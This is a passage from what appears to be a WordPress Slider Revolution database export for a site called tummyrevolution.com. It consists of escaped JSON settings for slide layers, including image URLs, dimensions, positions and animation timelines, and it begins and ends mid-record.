o_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\"},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"}}','{\"0\":\"\",\"version\":\"6.6.0\"}'),(5,3,1,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/pozadina-1.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"01\"},{\"v\":\"02\"}]},\"timeline\":{\"delay\":\"3020\",\"transition\":[\"slideoverright\"],\"slots\":[\"default\"],\"duration\":[\"80\"]},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"1\":{\"text\":\"Image 1\",\"alias\":\"Ananas\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide2-graphic5.png\",\"imageId\":2516},\"size\":{\"width\":{\"d\":{\"v\":\"397px\",\"e\":true},\"n\":{\"v\":\"368px\",\"e\":true},\"t\":{\"v\":\"363px\",\"e\":true},\"m\":{\"v\":\"196px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"400px\",\"e\":true},\"n\":{\"v\":\"371px\",\"e\":true},\"t\":{\"v\":\"367px\",\"e\":true},\"m\":{\"v\":\"198px\",\"e\":true}},\"originalWidth\":452,\"originalHeight\":351,\"aspectRatio\":{\"d\":{\"v\":1.2877492877492878},\"n\":{\"v\":1.2877492877492878},\"t\":{\"v\":1.2877492877492878},\"m\":{\"v\":1.2877492877492878}}},\"position\":{\"x\":{\"d\":{\"v\":\"-4px\",\"e\":true},\"n\":{\"v\":\"-4px\",\"e\":true},\"t\":{\"v\":\"1px\",\"e\":true},\"m\":{\"v\":\"1px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"38px\",\"e\":true},\"n\":{\"v\":\"38px\",\"e\":true},\"t\":{\"v\":\"-55px\",\"e\":true},\"m\":{\"v\":\"-12px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":5,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":3020}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-100%\"},\"n\":{\"v\":\"-100%\"},\"t\":{\"v\":\"-100%\"},\"m\":{\"v\":\"-100%\"}},\"z\":\"0\",\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":\"0deg\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true,\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1600,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true},\"timeline\":{\"speed\":1600,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3020,\"startRelative\":1410,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"2\":{\"text\":\"Image 2\",\"alias\":\"Coffe\",\"uid\":2,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h2-slider1-graphic3.png\",\"imageId\":1075},\"size\":{\"width\":{\"d\":{\"v\":\"131px\",\"e\":true},\"n\":{\"v\":\"131px\",\"e\":true},\"t\":{\"v\":\"131px\",\"e\":true},\"m\":{\"v\":\"89px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"138px\",\"e\":true},\"n\":{\"v\":\"138px\",\"e\":true},\"t\":{\"v\":\"138px\",\"e\":true},\"m\":{\"v\":\"94px\",\"e\":true}},\"originalWidth\":131,\"originalHeight\":138,\"aspectRatio\":{\"d\":{\"v\":0.9492753623188406},\"n\":{\"v\":0.9492753623188406},\"t\":{\"v\":0.9492753623188406},\"m\":{\"v\":0.9492753623188406}}},\"position\":{\"x\":{\"d\":{\"v\":\"233px\",\"e\":true},\"n\":{\"v\":\"140px\",\"e\":true},\"t\":{\"v\":\"50px\",\"e\":true},\"m\":{\"v\":\"48px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"225px\",\"e\":true},\"n\":{\"v\":\"110px\",\"e\":true},\"t\":{\"v\":\"150px\",\"e\":true},\"m\":{\"v\":\"184px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":6,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":340},{\"id\":\"frame_999\",\"start\":3020}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1200,\"start\":340,\"startRelative\":340},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1200,\"start\":340,\"startRelative\":340},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3020,\"startRelative\":1480,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"5\":{\"text\":\"Image 5\",\"alias\":\"Kokos\",\"uid\":5,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide2-graphic7.png\",\"imageId\":2536},\"size\":{\"width\":{\"d\":{\"v\":\"198px\",\"e\":true},\"n\":{\"v\":\"159px\",\"e\":true},\"t\":{\"v\":\"163px\",\"e\":true},\"m\":{\"v\":\"111px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"262px\",\"e\":true},\"n\":{\"v\":\"211px\",\"e\":true},\"t\":{\"v\":\"222px\",\"e\":true},\"m\":{\"v\":\"152px\",\"e\":true}},\"originalWidth\":209,\"originalHeight\":276,\"aspectRatio\":{\"d\":{\"v\":0.7572463768115942},\"n\":{\"v\":0.7572463768115942},\"t\":{\"v\":0.7572463768115942},\"m\":{\"v\":0.7572463768115942}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"v\":\"-87px\",\"e\":true},\"t\":{\"v\":\"-7px\",\"e\":true},\"m\":{\"v\":\"2px\",\"e\":true}},\"y\":{\"d\":{\"e\":true},\"n\":{\"v\":\"70px\",\"e\":true},\"t\":{\"v\":\"14px\",\"e\":true},\"m\":{\"v\":\"-59px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":8,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":340},{\"id\":\"frame_999\",\"start\":3020}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":2000,\"start\":340,\"startRelative\":340},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":2000,\"start\":340,\"startRelative\":340},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3020,\"startRelative\":680,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"7\":{\"text\":\"Image 6\",\"alias\":\"Kupus\",\"uid\":7,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide2-graphic11.png\",\"imageId\":2524},\"size\":{\"width\":{\"d\":{\"v\":\"878px\",\"e\":true},\"n\":{\"v\":\"591px\",\"e\":true},\"t\":{\"v\":\"464\",\"e\":true},\"m\":{\"v\":\"200px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"741px\",\"e\":true},\"n\":{\"v\":\"499px\",\"e\":true},\"t\":{\"v\":\"400px\",\"e\":true},\"m\":{\"v\":\"172\",\"e\":true}},\"originalWidth\":814,\"originalHeight\":702,\"aspectRatio\":{\"d\":{\"v\":1.1595441595441596},\"n\":{\"v\":1.1595441595441596},\"t\":{\"v\":1.1595441595441596},\"m\":{\"v\":1.1595441595441596}}},\"position\":{\"x\":{\"d\":{\"v\":\"12px\",\"e\":true},\"n\":{\"v\":\"12px\",\"e\":true},\"t\":{\"v\":\"-5px\",\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-19px\",\"e\":true},\"n\":{\"v\":\"-19px\",\"e\":true},\"t\":{\"v\":\"-10px\",\"e\":true},\"m\":{\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":9,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":380},{\"id\":\"frame_999\",\"start\":3020}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"{-250,250}\"},\"n\":{\"v\":\"{-250,250}\"},\"t\":{\"v\":\"{-250,250}\"},\"m\":{\"v\":\"{-250,250}\"}},\"y\":{\"d\":{\"v\":\"{-150,150}\"},\"n\":{\"v\":\"{-150,150}\"},\"t\":{\"v\":\"{-150,150}\"},\"m\":{\"v\":\"{-150,150}\"}},\"z\":0,\"scaleX\":\"{0,1}\",\"scaleY\":\"{0,1}\",\"opacity\":\"0\",\"rotationX\":\"{-90,90}\",\"rotationY\":\"{-90,90}\",\"rotationZ\":\"{-360,360}\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1840,\"start\":380,\"startRelative\":380},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1840,\"start\":380,\"startRelative\":380},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3020,\"startRelative\":800,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{